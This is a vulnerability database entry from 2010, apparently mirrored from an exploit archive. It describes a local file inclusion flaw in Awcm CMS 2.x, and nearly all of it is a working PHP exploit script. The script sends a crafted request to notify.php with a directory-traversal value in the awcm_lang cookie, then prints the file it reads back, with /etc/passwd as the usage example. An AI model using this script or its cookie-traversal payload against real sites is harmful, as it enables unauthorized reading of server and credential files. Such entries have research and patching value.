Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:24052
HistoryJun 14, 2010 - 12:00 a.m.

Awcm Cms Local File Inclusion Vulnerability

2010-06-1400:00:00
vulners.com
8

Author: SwEET-DeViL

Published: 10-6-2010

Software Link: http://www.awcm-cms.com/

Download Software: http://sourceforge.net/projects/awcm/

Version: 2.x

Tested on: Lunix

Exploit :

<?php

print("

| Awcm Cms Local File Inclusion Vulnerability
| By SwEET-DeViL
| x0.root(at)gmail.com
| example
|

Exploit.php ".$argv[0]." example.com /path/ …/…/…/…/…/…/…/…/etc/passwd
");
$host =$argv[1];//;
$Path = "http://".$host.$argv[2];
   $CURL_in =&quot;GET &quot;.$Path.&quot;/notify.php?v=a HTTP/1.0&#92;r&#92;n&quot;;
   $CURL_in.=&quot;User-Agent: Mozilla/4.0 &#40;compatible; MSIE 7.0; Windows NT 5.1&#41;&#92;r&#92;n&quot;;
   $CURL_in.=&quot;Pragma: no-cache&#92;r&#92;n&quot;;
   $CURL_in.=&quot;Cookie: awcm_lang=&quot;.$argv[3].&quot;&quot;.&quot;;&#92;r&#92;n&quot;;
   $CURL_in.=&quot;Connection: Close&#92;r&#92;n&#92;r&#92;n&quot;;

   if &#40; empty&#40;$argv[3]&#41; &#41;{
           echo &quot;&#92;n[-] Error : Exploit failed&#92;n&quot;;
           die;
   }

   $FoN = @fsockopen&#40;$host, 80&#41;;
   if&#40;!$FoN&#41;{
           echo &quot;&#92;n[-] Error : Can&#39;t connect to &quot;.$host.&quot; !!&#92;n&quot;;
           die;
   }

   fputs&#40;$FoN, $CURL_in&#41;;
   while &#40;!feof&#40;$FoN&#41;&#41; $data .= fread&#40;$FoN, 1024&#41;;
   fclose&#40;$FoN&#41;;

   $error_1 = strstr&#40; $data, &quot;HTTP/1.1 404 Not Found&quot; &#41;;
   if &#40; !empty&#40;$error_1&#41; &#41;{
           echo &quot;&#92;n[-] Error : 404 Not Found. &#92;n&quot;;
           die;
   }

   $error_2 = strstr&#40; $data, &quot;HTTP/1.1 406 Not Acceptable&quot; &#41;;
   if &#40; !empty&#40;$error_2&#41; &#41;{
           echo &quot;&#92;n[-] Error : 406 Not Acceptable. &#92;n&quot;;
           die;
   }

$EXc = explode("</head>",$data);
$EXx = explode("<head>",$EXc[1]);
$CODE = strip_tags($EXx[0]);
$CODE2 = preg_replace("/\r|\t/",'',$CODE);
$CODE2 = trim($CODE2);

if (empty($CODE2)){
print ('

[-] Error : Sorry! File not Found

');
}else{
print ('
[+]

').$CODE2;

print ('


');

}

?>